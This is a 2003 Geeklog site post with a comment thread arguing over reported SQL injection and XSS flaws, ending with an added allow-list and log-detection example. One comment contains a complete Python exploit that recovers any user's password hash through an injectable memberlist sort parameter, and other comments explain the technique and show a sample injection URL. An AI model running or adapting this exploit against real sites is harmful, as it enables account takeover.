Current Security Issues (Sept 2003)

Security

I'm sure by now many of you have heard of the Geeklog security issues that have been posted on lists such as Full Disclosure and Bugtraq.

One of the issues mentioned in that post regards the injection of HTML in the Shoutbox and can easily be addressed, as explained in the story "Fix your Shoutbox!".

The scarier bits, however, are the claimed SQL injections. Three members of the Geeklog development team have now tried to reproduce these issues and failed. That's not to say the issues do not exist, but they seem a lot harder to exploit than the post claims. Even the person reporting the issues couldn't (or wouldn't) produce a working example.

So we are still looking into it and will, just in case, eventually come up with a solution to filter these injections. In the meantime, it looks like this issue is not as dramatic as it first seemed.

We would also like to point out that the person who published that report didn't contact us before doing so. Doing so could have avoided a lot of confusion and even misinformation (the post even claims to have found the problem in a 2.x version of Geeklog, which doesn't exist yet). This is certainly not a very professional way to handle security issues. Regardless, we are taking the claims seriously and are looking into the matter as we speak.

Current Security Issues (Sept 2003)
Authored by: Anonymous on Monday, September 29 2003 @ 06:20 PM EDT
If no one can reproduce what he claims and he cannot give a working example, I think someone ought to submit a note to these bug trackers to close the issue. If he were a real security professional, he should be able to give a real-life working example of the exploits he proudly found right away. What is the point of reporting something no one else can reproduce?
Current Security Issues (Sept 2003)
Authored by: Tony on Tuesday, September 30 2003 @ 11:58 AM EDT
Once we have completed our own tests we may do that. It does appear you can do some things, such as gain access to some information that you shouldn't, but nothing super critical yet. It may still result in a security release, but until we get it all tested we can't be sure.

---
The reason people blame things on previous generations is that there's only one other choice.
crack any user's account
Authored by: Anonymous on Tuesday, October 07 2003 @ 09:21 PM EDT
#!/usr/bin/python

"""
Messy geeklog exploit by jelmer

usage :

0. If you haven't got python installed download it at http://www.python.org/

1. register an account at the geeklog server you want to crack

2. change

OUR_USER_ID
OUR_USERNAME
OUR_PASSWORD
OUR_EMAIL

in the source code below to the values assigned to the account you generated

change GEEKLOG_LOCATION to the location of the geeklog you want to crack, for instance
http://www.geeklog.net

3. Lookup the userID of the user you want to crack and fill it in as the TARGET_USER_ID below

4. run this script from the command line by typing python geeklog.py,
*nix users can also chmod +x ./geeklog.py
Now wait (quite a long time) as it needs to crack 32 positions

notes :

theoretically it can produce false results when a user registers while cracking is in progress
"""

import md5, urllib, urllib2, re


OUR_USER_ID = 7000
OUR_USERNAME = "yourusername"
OUR_PASSWORD = "yourpassword"
OUR_EMAIL = "your@email.com"

TARGET_USER_ID = 7001

GEEKLOG_LOCATION = "http://www.geeklog.net"


HASHCHARS = "0123456789abcdef"
GEN_PASSWORD_CHARS = "abcdefghijklmnopqrstuvwxyz"


def getSessionID(username, password):
    # log in with our own account and pull the session id out of the cookie
    myreq = urllib2.Request(GEEKLOG_LOCATION + "/users.php")

    data = {"loginname" : username,
            "passwd" : password
           }

    myreq.add_data(urllib.urlencode(data))
    page = urllib2.urlopen(myreq)
    cookies = page.info()["Set-Cookie"]
    match = re.search(r"gl_session=([0-9]{1,15})", cookies)
    return match.group(1)


def changePassword(sessionID, newPassword):
    # set our own account's password through the user settings form
    data = {"passwd" : newPassword,
            "cooktime" : "604800",
            "email" : OUR_EMAIL,
            "uid" : str(OUR_USER_ID),
            "mode" : "saveuser",
            "username" : OUR_USERNAME
           }

    cookie = "gl_session=" + sessionID

    myreq = urllib2.Request(GEEKLOG_LOCATION + "/usersettings.php")
    myreq.add_data(urllib.urlencode(data))
    myreq.add_header("Cookie", cookie)
    urllib2.urlopen(myreq)

    print "changed password to " + newPassword


def hexstr(inchars):
    result = ''
    for char in inchars:
        result += ('0' + hex(ord(char))[2:])[-2:]
    return result


def find(input, level, max, character, position):
    # depth-first search over lowercase strings of length max + 1
    found = False
    result = ""

    for char in GEN_PASSWORD_CHARS:

        if not found:
            start = input + char

            if level < max:
                found, result = find(start, level + 1, max, character, position)
            else:
                if hexstr(md5.new(start).digest())[position] == character:
                    return True, start

    return found, result


def generatePasswordWithHashCharAtPosition(character, position):
    # find a password whose md5 hex digest has the given character at the given position
    nrOfChars = 0
    while True:
        (found, value) = find("", 0, nrOfChars, character, position)

        if found:
            return value
        else:
            nrOfChars += 1


sessionID = getSessionID(OUR_USERNAME, OUR_PASSWORD)

print "got session ID : " + sessionID

result = ""
for i in range(32):

    print "cracked %s of 32 hash characters : %s" % (i, result)

    page = 1
    found = False
    for j in range(len(HASHCHARS)):

        changePassword(sessionID, generatePasswordWithHashCharAtPosition(HASHCHARS[j], i))

        while True:

            webpage = urllib2.urlopen(GEEKLOG_LOCATION + "/forum/memberlist.php?order=mid(passwd," + str(i + 1) + ",1),uid&prevorder=uid&direction=ASC&page=" + str(page)).read()

            us = webpage.find("users.php?mode=profile&uid=" + str(OUR_USER_ID) + '"')
            target = webpage.find("users.php?mode=profile&uid=" + str(TARGET_USER_ID) + '"')

            if us != -1 and target != -1:
                found = us > target
                break

            elif us != -1:
                break

            elif target != -1:
                found = True
                break

            else:
                page += 1
                print "probeer pagina " + str(page)

        if found:
            result += HASHCHARS[j]
            break


print "hash complete : " + result
Current Security Issues (Sept 2003)
Authored by: Anonymous on Tuesday, September 30 2003 @ 05:23 PM EDT
Need help? Hmm, give me a call, www.h4ckerx.net (xlordt). I myself was a scriptkiddie ;) now I'm a white hat, only when you don't piss me off =) anyways.. if you are interested in my help then xlord_tk@hotmail.com, else ignore this reply.
Current Security Issues (Sept 2003)
Authored by: Tony on Tuesday, September 30 2003 @ 05:51 PM EDT
Let me just open it up. Go out, read the claims on bugtraq and then see if you can reproduce any of them. Feel free to swing by our IRC channel if you have questions or want to chat with developers. The more eyes helping the better.

---
The reason people blame things on previous generations is that there's only one other choice.
Current Security Issues (Sept 2003)
Authored by: DTrumbower on Wednesday, October 01 2003 @ 12:09 PM EDT
Concatenated SQL Injection is not doable with mysql if your version is less than 4.1. So though it is still a future problem, it is not a big current problem for most people.

There still is the possibility of SQL injection but you just can't add damaging statements.

i.e. geeklog.net/topics.php?topic=general+;drop+ table

MySQL should give an error message.

---
Dwight
Hillarious
Authored by: Anonymous on Friday, October 03 2003 @ 08:18 AM EDT
hahahah.
Look at this.
The same guy that posted the supposedly found "bug", before letting the developers of Geeklog know first, USES GEEKLOG on his website.

http://security.novappc.com/

hahaha..

well. it doesn't even say it's also running "not such a Geek product" ;-)
Hillarious ? somebody was drunk...
Authored by: Anonymous on Friday, October 03 2003 @ 10:37 AM EDT
security.novappc.com was using pMachine since last year, but Geeklog is better and, of course, it is secured: it will not print errors or MySQL outputs. Dear anonymous, were you drunk?
It's not good for your brain.
regards.
Current Security Issues (Sept 2003)
Authored by: Dirk on Sunday, October 05 2003 @ 05:37 PM EDT

The same person has made yet another post to the Full Disclosure list (and, I assume, to BugTraq). This time, he posted a list of "fixes" since he claims the Geeklog Development Team was not quick enough in fixing things. Again, he did not contact us prior to his post.

I've posted a response to the list that can be found here.

bye, Dirk

Current Security Issues (Sept 2003)
Authored by: os on Monday, October 06 2003 @ 07:17 AM EDT
He also posted this on his webpage:

"
Due to the completely incorrect behavior of the Geeklog development team we had to design non-official patches for the Geeklog portal system.
These patches are to prevent and solve the SQL Injection vulnerabilities and the Cross Site Scripting attacks.
Geeklog Development Team ip addresses will be blocked in our server.
Check the BANNED staticpage for more info.

The security patches are available in http://www.nsrg-security.com/staticpages/index.php?page=FIXES-GEEKLOG

Regards, enjoy the patches.
"


os
Current Security Issues (Sept 2003)
Authored by: Anonymous on Tuesday, October 07 2003 @ 02:41 PM EDT
Geeklog Security Fixes


Here are the needed code and instructions to protect your Geeklog installation from bad users and the latest security holes (reported by Lorenzo Hernandez Garcia-Hierro), which are SQL Injections and Cross Site Scripting attacks.


Fix 1: The simple one-Cut & Paste


Cut this code and then put it in the first line of:
/[PATH TO YOUR GEEKLOG CORE FILES/CONFIG]/system/lib-security.php


Put it after the php tag



// ---
// Geeklog Security Fix against SQL Injections and XSS attacks
// By Lorenzo Hernandez Garcia-Hierro
// No Secure Root Group Security Research
// ---
foreach ($HTTP_GET_VARS as $secvalue) {
    if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*object*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*style*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*form*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*img*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*span*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*h1*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*table*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*body*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*pre*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*em*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*input*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*td*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*option*\"?[^>]*>", $secvalue)) ||
        (eregi(";", $secvalue)) ||
        (eregi("'", $secvalue)) ||
        (eregi("´", $secvalue)) ||
        (eregi("`", $secvalue)) ||
        (eregi("\\+", $secvalue)) ||
        (eregi("\"", $secvalue))) {
        die (";-) whereis *censored* *censored*: you");
    }
}



This will be included in all the files of Geeklog, providing full protection against SQL Injection and Cross Site Scripting attacks.


Fix 2: Obscure It !


This will stop MySQL errors being reported to users; Geeklog will not show an error output in web pages.


Edit the lib-database.php file in /system/ dir


Go to line 152 and then edit; this is the original code:


function DB_query($sql, $ignore_errors=0)
{
    global $_DB;

    return $_DB->dbQuery($sql,$ignore_errors);
}



Replace it with:


function DB_query($sql, $ignore_errors=1)
{
    global $_DB;

    return $_DB->dbQuery($sql,$ignore_errors);
}



No more MySQL errors outputs in html pages !

NOTE: By editing line 441 you can completely suppress the error output or add your own routines to the DB_error() function.


These fixes are made by Lorenzo Hernandez Garcia-Hierro due to the completely incorrect and non-professional behavior of the Geeklog Development Team.

Last Updated Sunday, October 05 2003 @ 11:01 PM CEST

------------------------------------------------------------------------

Get real, pitch in. I might not agree with the developers on all issues, but at least I play nice with them.

I would like to recognize the restraint, patience, and professionalism of our developers. Gentlemen I salute you in your efforts in looking to these problems and finding solutions that keep with the geeklog ideals.

And Mr. Garcia-Hierro, I salute you for your contributions to the GL community and efforts on our behalf. I hope you will continue in your passionate search for GL security loopholes, and for providing us with possible patches.

The first part of this post is to provide information to our developers, who most likely have already seen it via telnet/HTTP gateways that do not have banned IPs, the same way I did.

Thank you all, and I hope that future interactions will be filled with a spirit of cooperation, as opposed to one of conflict.

Enjoy your day.
repeat after me there are no sql injection issues, AGAIN there are no ..
Authored by: Anonymous on Wednesday, October 08 2003 @ 07:17 AM EDT
http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2003-10/0413.html
repeat after me there are no sql injection issues, AGAIN there are no ..
Authored by: jhk on Wednesday, October 08 2003 @ 09:25 AM EDT
Pedantically speaking, the FORUM PLUGIN has a problem with SQL injection like the SHOUTBOX BLOCK had one with XSS. Granted, these are used on a lot of sites but they are not part of the GL1.3.8-1 download. It is a bit unfair to blame the GL developers for coding insecure 3rd party add-ons. :)
repeat after me there are no sql injection issues, AGAIN there are no ..
Authored by: Blaine on Wednesday, October 08 2003 @ 04:32 PM EDT
You only have to enable the GL Filter to have all HTML filtered through the Core GL Functions. Additionally, you can limit the allowable HTML tags via the config.php.

The GL filter is not enabled on this site currently.
Current Security Issues (Sept 2003)
Authored by: Livin-Nappy on Thursday, October 09 2003 @ 03:02 AM EDT
OK, the long and the short of it for all of us that ARE NOT like super nerds (ALL HAIL THE SUPER NERDS WHO WITHOUT WE WOULD HAVE NO POWER!!!) What does this all mean, and what if any impact is it going to have on our sites?

---
Live Happy, Live Nappy!!
Michael
Current Security Issues (Sept 2003)
Authored by: Anonymous on Thursday, October 09 2003 @ 07:14 AM EDT
Basically you're screwed until someone patches the forum component, so one can get full admin privileges on your blog.

If you're also using MySQL 4.1 you also have to wait until they patch the SQL injection issues reported earlier.
Current Security Issues (Sept 2003)
Authored by: Anonymous on Thursday, October 09 2003 @ 10:53 AM EDT
This is uhhh kinda wrong. The forum has issues. These issues could currently be used to let a javascript take the cookie. The password is still encrypted so they would have to bust that. And they could only take the encrypted password of the admin if you tried to view that post with the javascript post.

A current fix for this is to disable the img tag, especially in your forum, and maybe just all your html tags to be especially safe. I'm not sure if this is easy to do in the forum as I don't use it, but that should work.

Most of these issues that are being posted currently are blown way out of proportion and you don't really need to worry about them. The geeklog development team is very very into security and if a real security issue is found be sure that it would be patched within a day or two.

I suspect all the issues, will be fixed in the next release, or in a service release if these are found to be valid issues. The forum will most likely be patched shortly.

I didn't proofread this message... sorry.
Current Security Issues (Sept 2003)
Authored by: Anonymous on Thursday, October 09 2003 @ 11:07 AM EDT
You are out of your mind. You don't have to crack the hash, you can just place it in your cookie,

because geeklog keeps you logged in for a fixed period of time: one hour, one week, one year etc.

How do you think this works? It works because it stores your hashed password and user id in a cookie.

as for the geeklog authors well they're clueless
Current Security Issues (Sept 2003)
Authored by: Anonymous on Thursday, October 09 2003 @ 03:28 PM EDT
You have a point. Whatever the case the issue with the FORUM plugin needs to be addressed, which I'm sure its being worked on. I do not believe this is an issue with any of the core features of geeklog.

Like I said before disable all your html and you won't have to worry about it.
Current Security Issues (Sept 2003)
Authored by: Anonymous on Thursday, October 09 2003 @ 07:13 PM EDT
You seem to not have noticed that the post also included a python script that uses SQL injection rather than XSS to crack the password, i.e. there is no defending against it.
Current Security Issues (Sept 2003)
Authored by: Anonymous on Friday, October 10 2003 @ 09:40 AM EDT
So far, like the other stuff, the python script has not been able to be a success. I have personally tried running it and it gives an error when trying to run. I can't really tell what it's trying to do except maybe exploit something else in the forum plugin. . . there's something to do with the forum plugin there.

So what have we still learned? The core geeklog has yet to have any security flaws actually seen. Plugin that a 3rd party made has some issues that need to be cleared up.
Current Security Issues (Sept 2003)
Authored by: Anonymous on Friday, October 10 2003 @ 02:46 PM EDT
> So far like the other stuff the python script has not been able to be a success. I have personally tried running it and it gives an error when trying to run.

It requires python 2.2 or higher

> I can't really tell what it's trying to do except maybe exploit something else in the forum plugin. . .
> there's something to do with the forum plugin there.

"/forum/memberlist.php?order=mid(passwd," + str(i + 1) + ",1),uid&prevorder=uid&direction=ASC&page=" + str(page))

You can order the memberlist by password, or more specifically one character of the password, and thus determine its contents.

> So what have we still learned? The core geeklog has yet to have any security flaws actually seen.

We'll just see about that

> Plugin that a 3rd party made has some issues that need to be cleared up.

Yes, and this site is running it, it could easily be defaced.
Current Security Issues (Sept 2003)
Authored by: tomw on Friday, October 10 2003 @ 03:06 PM EDT
I think you had better look at your code again. The forum memberlist.php does not allow you to sort the user list. Quit spreading this FUD until you know what you are talking about. Here is the code that retrieves the member list.

$memberlistsql = DB_query("SELECT * FROM {$_TABLES['users']} WHERE uid <> 1 ORDER BY regdate");

The order by is not changeable!

I also ran your python script and could not get it to run -- by the way my python version is 2.3.

TomW
Not Anonymous
Current Security Issues (Sept 2003)
Authored by: DTrumbower on Friday, October 10 2003 @ 03:15 PM EDT
Sorry Tom, you can order it.
http://www.geeklog.net/forum/memberlist.php?order=username&prevorder=uid&direction=DESC&page=1

The headings are links.

I can get the script to run a while but then it pukes.
Current Security Issues (Sept 2003)
Authored by: wlparks on Friday, October 10 2003 @ 03:24 PM EDT
tomw, sorry but there are huge security issues with the forum plugin(I was the one defending geeklog earlier in this thread). I suggest anybody using it take it down until it is fixed.

I was the one replying to the other things, but anyway I looked at the python script. I got it to run. It puked 5 minutes in, but his theory is right.

I guess it won't hurt for me to explain it here since anybody can look at his script.

You CAN order by anything on the memberlist page... I can't say that I have looked at the code for the forum plugin at all. Hell I haven't even installed it on my own personal site. But if they're using the latest version of the forum on geeklog.net you can sort by whatever you want. Order it anyway you want and more.

EXAMPLE.
http://www.geeklog.net/forum/memberlist.php?order=uid&direction=ASC

His python script didn't work for me but I could write something in another language that did the exact same thing. His theory is correct.

Here's how it works.

memberlist.php?order=mid(passwd," + str(i + 1) + ",1),uid&prevorder=uid&direction=ASC&page=" + str(page)).read()

What he is doing is pulling back a character at a time and ordering the page based on the one character that is returned from the password field. From this he can compare it to where your own placement is on the return and tell if it's higher or lower or equal. If you did look at the python script, it is constantly changing your own password so it can compare it better.

I believe this is how it was working if not, that way should work :-p
Current Security Issues (Sept 2003)
Authored by: wlparks on Friday, October 10 2003 @ 03:29 PM EDT
woopsy sorry didn't see the dudes post that already explained how it worked.
Current Security Issues (Sept 2003)
Authored by: tomw on Friday, October 10 2003 @ 03:30 PM EDT
I admit I wasn't looking at the new version since it hasn't been released officially yet. The version for download here and most widely used does not have a sortable memberlist.

TomW
Current Security Issues (Sept 2003)
Authored by: Blaine on Friday, October 10 2003 @ 08:05 PM EDT
It appears this python attack was run against the new (un-released) membership.php that I was testing on this site and have distributed to a few users for testing.

I had enhanced it (albeit now I see the issue) to sort the display to improve its usefulness. I've tried to inject SQL to add the order by clause in the current 2.2 release and was not able.
I'm able to force the ORDER BY SQL clause to be added to the sql statement but it is rejected as improper SQL syntax.

This was tested on MYSQL 3.23. I've not heard that anyone has done this on the released forum 2.2 release code.

I will be adding logic to filter out any SQL from being added on the URL path.

To filter out any Javascript and IMG tags with JS - just enable the GL Filter and ensure the IMG tag (and other potential XSS supported tags) are not allowable HTML.

Blaine
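As an added example (not code from Geeklog or its forum plugin), here is one way to do what Blaine says he will add, written in Python rather than the plugin's PHP: the `order` and `direction` request parameters are only ever used to look up a fixed column name, so the one-character-of-`passwd` sort that the thread describes can never reach the query; a second function flags such values in web server access logs. The column list beyond `uid`, `username` and `regdate`, the log format and the log lines are constructed for the example.

```python
import re
import urllib.parse

# Allow-list of sort keys the member list may be requested with. The names are
# constructed for this example; the thread only shows uid, username and regdate.
SORT_COLUMNS = {
    "uid": "uid",
    "username": "username",
    "regdate": "regdate",
}
SORT_DIRECTIONS = {"ASC", "DESC"}


def build_memberlist_query(order, direction="ASC"):
    """Return the member list query, or raise ValueError on unknown input.

    Request values never become part of the SQL text; they only select an
    entry from the allow-list, so "mid(passwd,1,1),uid" is rejected outright.
    """
    column = SORT_COLUMNS.get(order)
    if column is None:
        raise ValueError("unknown sort column: %r" % order)
    direction = direction.upper()
    if direction not in SORT_DIRECTIONS:
        raise ValueError("unknown sort direction: %r" % direction)
    return ("SELECT uid, username, regdate FROM users WHERE uid <> 1 "
            "ORDER BY %s %s" % (column, direction))


# Constructed access-log lines in common log format. The last one carries the
# kind of query string the thread describes (sorting on one password character).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2003:15:02:11 -0400] "GET /forum/memberlist.php?order=username&direction=DESC HTTP/1.0" 200 8123
203.0.113.5 - - [10/Oct/2003:15:02:19 -0400] "GET /forum/memberlist.php?order=uid&direction=ASC&page=2 HTTP/1.0" 200 8101
198.51.100.7 - - [10/Oct/2003:15:03:40 -0400] "GET /forum/memberlist.php?order=mid(passwd,1,1),uid&prevorder=uid&direction=ASC&page=1 HTTP/1.0" 200 8140
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET (?P<path>\S+) HTTP')


def suspicious_sort_requests(log_text):
    """Return (client ip, order value) for memberlist requests whose sort key is not allow-listed."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urllib.parse.urlsplit(m.group("path"))
        if not url.path.endswith("/memberlist.php"):
            continue
        params = urllib.parse.parse_qs(url.query)
        for value in params.get("order", []):
            if value not in SORT_COLUMNS:
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    print(build_memberlist_query("username", "desc"))
    for ip, value in suspicious_sort_requests(SAMPLE_LOG):
        print("flag %s: order=%s" % (ip, value))
```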
Please stop the ad-hominem attacks
Authored by: Anonymous on Thursday, October 09 2003 @ 12:24 PM EDT
I don't think this attitude of "you're clueless", "you're unprofessional", "you're a liar" (said to Dirk on the Full Disclosure list) helps anybody. The people making these claims need to learn that you earn others' respect by showing them respect.